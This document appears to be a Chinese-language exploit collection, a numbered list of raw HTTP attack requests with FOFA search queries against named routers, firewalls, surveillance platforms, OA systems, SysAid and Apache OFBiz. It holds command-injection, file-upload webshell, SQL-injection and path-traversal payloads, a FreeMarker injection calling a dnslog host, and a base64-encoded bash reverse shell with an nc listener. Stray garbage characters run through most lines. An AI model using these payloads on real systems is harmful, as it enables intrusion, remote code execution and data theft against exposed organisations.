$ Y% n% d/ |+ SContent-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"; W: e+ a6 ]3 G0 M; C$ d
Content-Type: image/png
T, M. F% Y2 l& S& V: X0 K7 L0 M% e; H' L% m$ Y3 w
YsOxWxSvj1KyZow1PTsh98fdu6l
, m% F' f# @( E9 X' ]7 Y2 g------YsOxWxSvj1KyZow1PTsh98fdu6l1 z5 @- i7 F' ?' f+ X$ \$ }
Content-Disposition: form-data; name="target"
4 B% G- Q/ e( E6 \/ x4 v$ G
& W5 q& F t) Q' J0 n5 v1 `9 r/Applications/SkillDevelopAndEHS/
% R$ o) ?4 U4 D5 I3 T4 u------YsOxWxSvj1KyZow1PTsh98fdu6l--7 g, A& ?: f8 w d4 l0 |
' ]4 S& w9 G0 q2 `# N c7 l6 j: c0 e6 Z
6 s! y% z& ~* z4 C# G6 |GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
a$ l( W& Q6 O7 x2 DHost: x.x.x.x' n, n) [9 |- F5 q( v! E
# `9 y! z- X6 n0 m/ t; f. v8 Y8 ?" w4 o& `% k4 c, m7 N2 t# z
79. BYTEVALUE 百为流控路由器远程命令执行; X5 h% H$ [9 K6 F5 i: r
FOFA:BYTEVALUE 智能流控路由器
) @% V* F! a/ L8 J" iGET /goform/webRead/open/?path=|id HTTP/1.1' `, _% o6 {8 E/ S
Host:IP" k1 _6 y7 S2 A3 M7 h+ R
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0& s. ]/ E) o+ Q2 o5 H# g8 j
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8: @( ~& \; [9 x
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.21 Q3 O" q9 g7 x& l- o t- q: A
Accept-Encoding: gzip, deflate
V2 l3 ?3 P' X% SConnection: close3 \3 a) }9 h4 o2 X
Upgrade-Insecure-Requests: 1
5 A; G7 G+ I( C' l2 N
, ^/ l5 D2 G, m) B
" _: O6 {& b# M. t7 ^80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传 ~6 j. ^3 p) R0 R
FOFA:app="速达软件-公司产品"6 h2 |% ~0 D( l9 a! @, B G
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
+ E/ z" Q) c8 ^) }Host: x.x.x.x# K: X1 d. O, \7 t5 {& z+ _; E* u$ J
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.155 N; A& l) o* J3 R, i$ x+ c
Content-Length: 27- Q9 ]# ` e; g3 ^
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
9 i0 j1 m+ q# [/ N7 z* qAccept-Encoding: gzip, deflate9 D: j) z2 E. ]: F6 B6 `7 X
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.21 _- k' G0 D* {9 R- s: `3 t
Connection: close
9 [! ]) C+ I' ZContent-Type: application/octet-stream) }0 t8 j0 z- a5 |5 s5 o
Upgrade-Insecure-Requests: 1( {$ G3 W6 A6 u' _% n
, M% g/ r+ m {0 X, B+ x! d) F4 f
<% out.print("oessqeonylzaf");%>
6 m, A; U0 t" }5 j$ H5 ?
) l3 P3 P$ |" G. p- h9 W+ b! T/ y, S- l% V
GET /xykqmfxpoas.jsp HTTP/1.1" w/ _0 i5 D9 y# P. n+ G1 i+ \
Host: x.x.x.x4 x) s# g/ k+ E6 l2 o# F/ H
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15; N5 X+ D) b$ `7 f
Connection: close
& O. K& H9 q+ H) L3 E2 {Accept-Encoding: gzip) D" M$ i) y1 }5 m: |# Y
1 W4 V! m# w% b2 b* {1 Q' V j
8 ^# p7 y1 m! M6 Q81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
) E( @- `+ [* O' f. B- p+ FFOFA:app="uniview-视频监控"7 h# @9 l1 J+ P, |( c
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
9 E$ ~: J! G& i+ Q9 qHost: x.x.x.x' Y+ ]1 Y1 \# O5 m) q3 O
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
3 L5 @4 M: t a+ ~" k' ?Connection: close
$ W! l, B- B, Q& }* T" m( N5 H" M% XAccept-Encoding: gzip
( X) }6 ~! G) |, R1 U: A9 D
8 D4 c$ j- u. j T/ ~0 v" J! t: q+ n% H- H' o. N F( ~
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
$ L: i( [2 ^* bFOFA:app="思福迪-LOGBASE"
1 E; V b0 M: K$ x) z& zPOST /bhost/test_qrcode_b HTTP/1.1' _& f" ^4 a+ x- B$ Y" o$ `4 m
Host: BaseURL- A) J+ M- r7 q/ O5 f$ ^7 g
User-Agent: Go-http-client/1.19 b: y0 }, Y* A
Content-Length: 23
J m1 o$ }3 D: tAccept-Encoding: gzip \6 y: ]' H0 |0 @4 m
Connection: close
, |# w( w: C# _* S, x2 E4 OContent-Type: application/x-www-form-urlencoded! n) A2 x; o5 m0 i( s
Referer: BaseURL4 {# }; C9 i+ r% V! C
: p' \' O* L) j: t. U' E
z1=1&z2="|id;"&z3=bhost
2 z" _& s6 z1 i( d7 T' ?
9 ?' {1 T0 z! y" P. N" q9 g+ k. r. q8 _( `7 @2 U* L
83. JeecgBoot testConnection 远程命令执行
3 \' k) g+ }8 K& t( jFOFA:title=="JeecgBoot 企业级低代码平台"# s; d0 ?7 I5 U8 m) g/ S. r! n& N
4 @" U5 R2 ?# k2 R$ d
* N+ [$ o# o. s* M
POST /jmreport/testConnection HTTP/1.1" ~8 c0 w# u9 V, ]/ d- D3 o
Host: x.x.x.x& c% c C& h' Z9 U
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15% S" E9 O, G: x
Connection: close9 @% ?; h2 e+ z+ d6 N/ O# f* ?
Content-Length: 8881, P' R l; |: P5 z6 b9 C" x- o
Accept-Encoding: gzip
8 W0 l' D$ }0 @* tCmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"7 h2 h& c, d% Y" n) T. C! g0 r
Content-Type: application/json
w' p$ s7 Z9 o+ F; _3 h
! a& L0 h% p v( NPAYLOAD. X& {, a7 ]. Y9 d8 V) O6 {
4 D( B) u! N. n3 l% \84. Jeecg-Boot JimuReport queryFieldBySql 模板注入) u: ?5 |( p3 q
FOFA:title=="JeecgBoot 企业级低代码平台"' w( S# D- ^# m- U
# L8 G- \9 j9 H2 O# b% X1 w
; Z; k) U" ^0 _, V# S; w3 B1 X+ j
' V. J8 ]: ]- V+ F4 o% RPOST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
7 u& ~" _# h1 XHost: 192.168.40.130:80803 R# I: u& M5 y: I" x8 ]
User-Agent: curl/7.88.1- y x/ w4 r! g1 }, L
Content-Length: 156
4 y; h `' E* O% `7 a! xAccept: */*5 p& ?0 Y/ l/ z7 @/ }
Connection: close
+ [2 ~( q6 X5 }4 J- K+ |Content-Type: application/json
# c1 r% o& I% y7 f! Q2 Y hAccept-Encoding: gzip& X. b3 R1 F& L" V \
4 U: ]) l6 l2 _5 F* R
{" F; Q- V% g! Q
"sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",% C5 q* _$ Y# a, F, d
"type": "0" U" a7 K! A9 n; ?4 b: \0 C7 K2 i
}
+ a+ q! w7 P$ s
. l$ Z5 R, W+ o$ |; K1 |
; W5 d* D$ n% p! M l( N4 |85. SysAid On-premise< 23.3.36远程代码执行9 b! A' j$ S, W, T
CVE-2023-47246, T0 A2 }% i) R. \) ]
FOFA:body="sysaid-logo-dark-green.png" 1 A3 f5 M7 ?7 W0 N5 p) ]/ s
EXP数据包如下,注入哥斯拉马
! R8 s0 u# ?, Y, }" dPOST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1* F4 v' i" C; ?* p3 d* _
Host: x.x.x.x
: c# n% j. d, s. S+ U+ R! y- y7 hUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15. o7 b* X0 u. X7 \7 o
Content-Type: application/octet-stream
0 n- m* _: r% h* I" B! }Accept-Encoding: gzip- v {, h* C& h
$ r( N) [9 ~6 E* [" \
PAYLOAD
3 `8 R3 g# z1 Z- o( |6 y4 N3 m. g! j) ^6 b
回显URL:http://x.x.x.x/userfiles/index.jsp/ x& p9 O) \) ~* d
: z1 P+ G4 E4 ~. {8 S, z9 V
86. 日本tosei自助洗衣机RCE
# }5 N& H* r+ i& K! [9 IFOFA:body="tosei_login_check.php"* `+ Y- T4 G' Q; Q) z
POST /cgi-bin/network_test.php HTTP/1.1& b E$ z' W# |8 y6 S0 v
Host: x.x.x.x& E [) G+ `: [7 x/ |$ ^2 E
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36: @' v+ Y" v: Z( n
Connection: close
3 D. Q$ p e, Z4 ?; O4 B$ l& [& QContent-Length: 44/ V/ X1 K( a, A# c/ N
Accept: */*
2 V3 ]7 b1 I3 ]' z! `Accept-Encoding: gzip
3 B; D* R' n1 |- V) TAccept-Language: en
) r; k4 E9 }( C; HContent-Type: application/x-www-form-urlencoded
. W) ~: n# y$ G6 }* J+ N( l
9 }4 g- d; h( F3 O: i0 rhost=%0acat${IFS}/etc/passwd%0a&command=ping
9 q4 Z6 s6 M- P7 z* X9 L
, ^% M4 E$ S+ `) S; m5 ~% t. K4 {6 Y) s- F5 a
87. 安恒明御安全网关aaa_local_web_preview文件上传
/ [) h" B: g4 E. K$ C* F( a t. @* dFOFA:title="明御安全网关" f9 P$ ~* \# x p; s
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
- N1 `4 z4 @0 K0 J, C6 J& zHost: X.X.X.X6 L Y1 {6 w5 o6 P
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15' e9 \& h7 h, H4 a2 G9 A8 l
Connection: close$ U3 W3 w. D! c7 ~7 U1 Q' y( u
Content-Length: 198. N' f; `- b, n, H/ ?/ X- h
Accept-Encoding: gzip0 g7 H9 h2 q3 m( h
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd
) J; _) y g2 w( B4 H j. v6 ~" |$ R/ }3 p# J6 @
--qqobiandqgawlxodfiisporjwravxtvd
5 ?% y4 [7 `$ l: J: U! L$ GContent-Disposition: form-data; name="123"; filename="9B9Ccd.php"
& O) H: K# W7 A2 N! cContent-Type: text/plain' X# b, s6 ^* t. e
4 @- f7 D D8 s2ZqGNnsjzzU2GBBPyd8AIA7QlDq
& e3 F, Z- E% q4 v--qqobiandqgawlxodfiisporjwravxtvd--
7 Z) ]& J2 Q4 r/ R) Q4 y
, ?& m$ e0 j, H# }: t3 b: Y
7 W' W2 \/ M+ Q4 m' ]% E/jfhatuwe.php* {, [$ |2 u2 S% p! C
1 K) T! e, K8 C2 R' W
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行% u% `; P1 ?3 {, p( U) K0 Q
FOFA:title="明御安全网关"
5 T( y! V& M& ?$ ]/ C1 J4 DGET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1$ [* Y+ }( W, d+ e7 q: L/ C
Host: x.x.x.xx.x.x.x
/ G+ l# M1 q# a" w; }/ E+ ?0 H: fUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 p) O5 `- {5 y' r O/ M; N: H$ O
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
$ T) A1 ^2 I2 c8 ?Accept-Encoding: gzip, deflate5 O! y: T8 M/ v% _4 A3 q
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2+ |/ a* `& B( j! H) S' r0 ]
Connection: close# |! D0 V, C2 r0 m+ c+ n7 w* b6 I, G
W8 k' V7 H' o8 ^# C- b
: b! b- ~" K3 E0 H# `4 S/astdfkhl.php. o4 P. `: F; |; L' o
" p. B6 x9 B3 Z; ~5 B# `
89. 致远互联FE协作办公平台editflow_manager存在sql注入
: n+ N" G# ] \FOFA:title="FE协作办公平台" || body="li_plugins_download"' l/ G2 b% t- C7 u6 }
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
1 p# W( R1 @9 o4 SHost: x.x.x.x3 z9 F9 F5 i( ]2 f5 R
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15+ I0 K) u- a. ]5 B- h |
Connection: close
5 ^% r6 h2 W" g: c1 wContent-Length: 41
2 o* H0 R/ @ o5 G* N0 DContent-Type: application/x-www-form-urlencoded6 V2 S, H% z1 _0 A1 u+ N
Accept-Encoding: gzip
# N8 e$ [! b8 i( b) A8 i: A+ E( s" Z* C) C. ]; i
option=2&GUID=-1'+union+select+111*222--+
* h9 y4 i2 P8 D+ _% F5 L0 a! ^6 ?8 t- U
/ @2 I' C9 l9 Y- u0 o8 m; p90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
' n l; |6 h/ K- Y: _5 h& y: S- ZFOFA:icon_hash="-1830859634"
b; `' C$ ]4 TPOST /php/ping.php HTTP/1.1 w! F6 K3 x1 I, Q! P5 w; {
Host: x.x.x.x I2 u3 C: Y; D5 h- Q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0( ?, T1 @/ y, E/ L, b7 b4 j2 y
Content-Length: 51! P0 V6 ^; U6 |# R2 p t2 t
Accept: application/json, text/javascript, */*; q=0.01
9 U% s& W2 B% G7 `& J5 e5 t& M3 ]Accept-Encoding: gzip, deflate9 k# x1 T# t0 n
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2+ N/ m* t- C; W# j
Connection: close
/ v" a* S( U2 E! u& E9 O" tContent-Type: application/x-www-form-urlencoded. S+ t8 `% L& j& D9 F
X-Requested-With: XMLHttpRequest
6 [% p' m/ V, [9 R7 X; K( J9 ~$ V7 K
jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig$ k' l% \3 P0 |# s+ f* i
6 R: x" q3 ~3 P* v
% T) x$ p3 p- x! }% R+ W `9 L; U91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
2 ^+ R! B6 E. k" j3 H, kFOFA:title="综合安防管理平台"
( ]1 B7 A2 h: _! ?) ~; lGET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1% J4 n& s, e% o& L+ E
Host: your-ip. A& ^1 z' H: a- ^ P+ n+ x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
. q' w) N& r# D$ B! f# fAccept-Encoding: gzip, deflate
6 k: ]* c7 h/ W* O0 jAccept: */*
- f. ^# h4 j% w( h8 a' XConnection: keep-alive
' }, F6 M! G& _, j; H! l+ p4 i# k4 {" b8 q& J9 K& D3 J: U
( R" q5 { Y% R! }( m3 X3 _
$ A# G3 h+ v' N92. 海康威视运行管理中心session命令执行
! C8 W# D4 {, B V3 QFastjson命令执行, y: _* B: Y& p) }7 e% X2 ?
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
* b9 d& |5 J) qPOST /center/api/session HTTP/1.1
u; M0 k. q) w0 l8 jHost:
. q! j1 D9 s4 ?, J2 w0 S8 b/ \5 UAccept: application/json, text/plain, */*
- L) l% Z Q* ]4 xAccept-Encoding: gzip, deflate* j; _* l( }" s- j+ T0 ^- [
X-Requested-With: XMLHttpRequest
$ c; Y% k# O: q5 R0 T! o1 `Content-Type: application/json;charset=UTF-8
% x2 t/ R' q2 s9 P7 k- `2 y8 tX-Language-Type: zh_CN" q& J) w" k6 d3 C1 C
Testcmd: echo test7 j! Q+ M. R6 y4 ?& _0 M3 P# A
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36- F0 _0 J" Y$ b( f* e: y
Accept-Language: zh-CN,zh;q=0.9$ ~# U4 ^. e5 ~# U( O* |' ^- L
Content-Length: 5778
$ Y8 g. c% l t) C4 P. V# I% W5 K0 U: D" ?
PAYLOAD
o* ^, w5 o& s, z$ d
9 p- s1 ~% Y& d; e# z5 C6 K: b" J$ o$ s4 _3 y, [6 }$ n: R
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传# t) j- R4 R* b4 m
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
4 e' D6 Z0 ^& G" `% O* K8 g4 oPOST /?g=app_av_import_save HTTP/1.18 \. M( b& a9 a/ T/ T/ [
Host: x.x.x.x, R+ v, R8 U2 p% s+ D1 N
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx' L5 {) W Z! H* ^" h
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.365 Z' S3 h g7 I+ n, r
$ b3 F: \0 X. f3 R6 f------WebKitFormBoundarykcbkgdfx% j, z' d# B1 f# {& g# K. G/ _/ [
Content-Disposition: form-data; name="MAX_FILE_SIZE"
0 M6 S$ d. q m8 q4 {1 D8 \4 b }, [ ]7 y0 d1 Y
10000000% y' {- v. t# e% E. X
------WebKitFormBoundarykcbkgdfx6 F1 M6 P; j9 P# u5 `/ ]+ g( P
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"4 J2 v0 R p- |) V
Content-Type: text/plain
2 v/ Y, v0 X# K& r, p( A8 P# s) L+ @! G9 G: u# h
wagletqrkwrddkthtulxsqrphulnknxa. b& _/ ]- z& O
------WebKitFormBoundarykcbkgdfx M1 Q6 J- O, x2 y: J, \' Q/ S
Content-Disposition: form-data; name="submit_post" `' E; o U: f3 P+ F
! D+ f+ v+ l$ ?3 [7 k! s9 Aobj_app_upfile$ l6 S s7 A( |& h
------WebKitFormBoundarykcbkgdfx& C0 S2 `% x+ I
Content-Disposition: form-data; name="__hash__"4 {7 c; B: S- V; J$ u0 T$ J7 t b0 u
& O: w4 H( S2 J N+ |2 L7 S% s0b9d6b1ab7479ab69d9f71b05e0e9445 |- ]( ?8 g' A1 G6 Y
------WebKitFormBoundarykcbkgdfx--4 H9 l- Y( e6 `, r, U, Q! X: w$ l* N
7 b8 k, u8 t8 f+ y+ e
, z0 M$ |8 H pGET /attachements/xlskxknxa.txt HTTP/1.10 y) x+ C+ C& o p! }
Host: xx.xx.xx.xx+ L4 |! p' r. F& e0 X
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
) F( t d, _+ j1 ^0 E8 M
% c6 T+ t$ G* j" a5 T$ |! F4 J/ B% l2 [* A
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
: I) E- Z" ]: F- y' G3 xFOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="0 u5 ?. u- _6 x& |# u; ~
POST /?g=obj_area_import_save HTTP/1.16 w( S+ P% @* H% ]8 X
Host: x.x.x.x3 }+ E. ]0 h! w5 ]6 O
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt( O1 y* c' [. Q% N, w
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36. f: W9 k+ W4 `$ G+ U/ h( X+ H5 D
# C% U6 C$ O8 O! B/ V
------WebKitFormBoundarybqvzqvmt) _) D2 W. _+ i! ^, `
Content-Disposition: form-data; name="MAX_FILE_SIZE" E: m' Y# u4 O; J
. @0 A6 A/ j4 J
10000000 J" a6 M% N+ C! J+ K
------WebKitFormBoundarybqvzqvmt
, d- h/ P# T: Y# DContent-Disposition: form-data; name="upfile"; filename="cciytdzu.txt") W3 d# {" r& ^+ K! z2 `( T4 l- G0 r
Content-Type: text/plain3 F5 ~! B4 f# I" j
. { [3 s9 J/ X/ v4 l' M! s+ Y
pxplitttsrjnyoafavcajwkvhxindhmu3 f* J# j. _* u1 k9 ?, D T" \8 G- Q
------WebKitFormBoundarybqvzqvmt+ J; s$ v% Y# v+ x* R- k- m* @
Content-Disposition: form-data; name="submit_post"
/ @7 [5 E T o R( V. e% \
, [# F, D/ O6 F" k1 yobj_app_upfile
& h1 L3 E; V/ L5 Q% b------WebKitFormBoundarybqvzqvmt. ]0 H, T7 [4 A3 s! o
Content-Disposition: form-data; name="__hash__"
4 x) F9 ~ [; H( Q& Q7 a; b
- B9 g2 g) k7 d% m' @" C3 J5 y0b9d6b1ab7479ab69d9f71b05e0e94455 K+ F% {8 N% k' G5 k! l
------WebKitFormBoundarybqvzqvmt--
; L6 r7 o" r: z1 w# z, {' t. c- \7 V( Z( x* L
6 f+ d+ O' N4 q: ]/ C
1 V, c I6 m; k# j" c) bGET /attachements/xlskxknxa.txt HTTP/1.1
* H/ n4 M8 N" P& m5 \2 f1 L7 XHost: xx.xx.xx.xx! B) ?7 s: E% |# D9 O" u6 q
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
' P; l* q ~8 z
# p3 z: a, [1 b' R6 }" r+ n5 n6 V c% [3 ?
~( n, a9 z: p- G; v5 t' ]3 K. ^; `95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行8 L8 o! `% N9 X( }
CVE-2023-49070' X( l% ?* P `7 g, D0 h& \2 W7 f
FOFA:app="Apache_OFBiz"
! H0 f& a- D( N6 IPOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
& \9 ]0 g7 a6 W! V& THost: x.x.x.x
* Z/ L) L' ]' v8 X6 vUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36- r) C. G3 x. h& K% B
Connection: close
( p/ }- u4 k( Z* t! W t; @* `Content-Length: 889
5 r& z( H! I1 d k! ^Content-Type: application/xml
0 m1 v$ h7 w1 l6 x6 lAccept-Encoding: gzip
6 f M/ L4 N0 ?3 O- ]# r% T7 |% m( t9 q" E: F3 }, t- {
<?xml version="1.0"?>
8 l0 |: \ h$ R# v<methodCall>5 q3 _7 U& T0 `) q! t/ j# H/ t. h
<methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>4 o9 h* O# L# o. U
<params>" I& F# x/ F# D& E i; X1 y
<param>3 b' j- W- w! x+ K' Q$ l
<value>" |: C7 \' ~& s- @) \" V0 \
<struct>
; q6 R" T1 K" r' M" q5 o <member>/ H1 X# d. t5 K/ ]) w+ F
<name>test</name>6 L x+ B4 j' i
<value>& V& `( ~$ e- Z6 X6 {0 m+ l- m
<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>+ g$ |/ s3 L9 e5 _* b) H S( z
</value>" k" E5 m& |% Z
</member>
! U$ I# m& C5 a+ t* N0 r- {; j4 } </struct>
5 s! L7 s$ ]8 U1 b, G. l0 I </value>
1 A6 e$ t/ T% ?6 H </param>
: t+ i& o/ l3 Y5 k2 e2 n) X+ Q </params>* w* E$ \- e0 G8 Z# F' z: I& I
</methodCall>& E' h }/ F9 `/ v
, {7 q' P% a8 S8 i# A1 J) S1 d
+ \, a4 y: |, n6 v用ysoserial生成payload
' u( b7 ~- A6 f z1 q- g. }java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"7 W4 j! w) @5 x/ R7 p+ f/ g' k/ J
1 r7 S8 t8 K1 Q2 X1 H& f* D6 ?, R
$ @' Y( H! |5 o! h& g* b将生成的payload替换到上面的POC& q% R! ] z/ [/ ^. F: ]* f; V
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1# [: P/ T/ r* P$ Z1 Q
Host: 192.168.40.130:8443
, U2 l* s) b$ I0 y& I( x& w+ W9 wUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
: Z) n, t+ h8 w) q7 Y' G- AConnection: close
* d% x; m- P y4 N: [Content-Length: 889( y/ N( F: S" e* Q9 h
Content-Type: application/xml; _! y: |9 s6 P
Accept-Encoding: gzip
' q2 v- s t1 Y0 |# b, z5 G8 L" ~, k4 f4 u. ^# U
PAYLOAD
# ?9 k {; Q0 L! O7 |9 m1 l0 w& @5 Z
96. Apache OFBiz 18.12.11 groovy 远程代码执行, L" p+ X- ]% {; _& R! f9 z
FOFA:app="Apache_OFBiz"
2 p8 G9 a" i( L' ^: A- ~6 C! TPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
( `6 i, x9 R L z4 d7 L: SHost: localhost:84432 T! b' O+ }7 ]8 L% ]7 o
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
* Z% @- O+ H5 vAccept: */* d2 h! m- F6 d# u
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
( }4 U2 m& \ @5 D: U; \) BContent-Type: application/x-www-form-urlencoded' n4 b7 `" H0 Z+ A( S3 q& z! k1 F
Content-Length: 55
- d% z" `. v2 a. Z9 R R+ V; O! h) U, p% D( v, x
groovyProgram=throw+new+Exception('id'.execute().text);
; @" E$ @7 F: B+ i6 m4 u+ V
' c! S/ U& I+ L1 E3 M9 Y; ]6 _+ K
# V3 I" n" U; v0 A2 ~; P反弹shell9 x7 w( _3 ]: f3 Z
在kali上启动一个监听6 j% n/ q& o- I8 r: }8 ~9 o4 C
nc -lvp 7777
7 P) ^9 }7 f. I1 P" M4 ^
* O. g* z. A. {POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.13 P* v: |& {6 o, l8 K& P, H
Host: 192.168.40.130:8443; e9 z% k7 Y! {2 s p3 `( R
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
3 [; i7 H( w' z, bAccept: */*& n1 h2 W$ f, ^2 v
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2& H4 H, \& T) ]. [9 T( N. e& a4 v5 G6 q
Content-Type: application/x-www-form-urlencoded" e* Z5 z, J5 f O# c- q4 b
Content-Length: 718 z7 T+ S7 G7 Z& h+ O
, J( r0 n+ K' VgroovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();/ p9 V$ S7 \) L
' i6 d3 ]( m5 C4 a
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行2 }- s; b7 K$ {( i$ }. }
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"! c# k8 p) l$ g' h; e' k9 C' w
GET /passport/login/ HTTP/1.1
8 u% }/ S+ |( P, R6 lHost: 192.168.40.130:8085) B4 X' `* M, D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15* g0 r( d5 c! ]3 W5 m: g/ d
Accept-Encoding: gzip9 i8 H% S# J$ g+ U) G( ? O
Connection: close, L6 k! w# P% E" |1 k0 q
Cookie: rememberMe=PAYLOAD8 F5 L; E6 Y7 {. t, I
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"& ?( M. w1 z& _) G. G
4 J/ X' z/ R1 \8 o5 a& m8 l3 c0 u: S- G% D+ A2 ]# Z* w
98. SpiderFlow爬虫平台远程命令执行
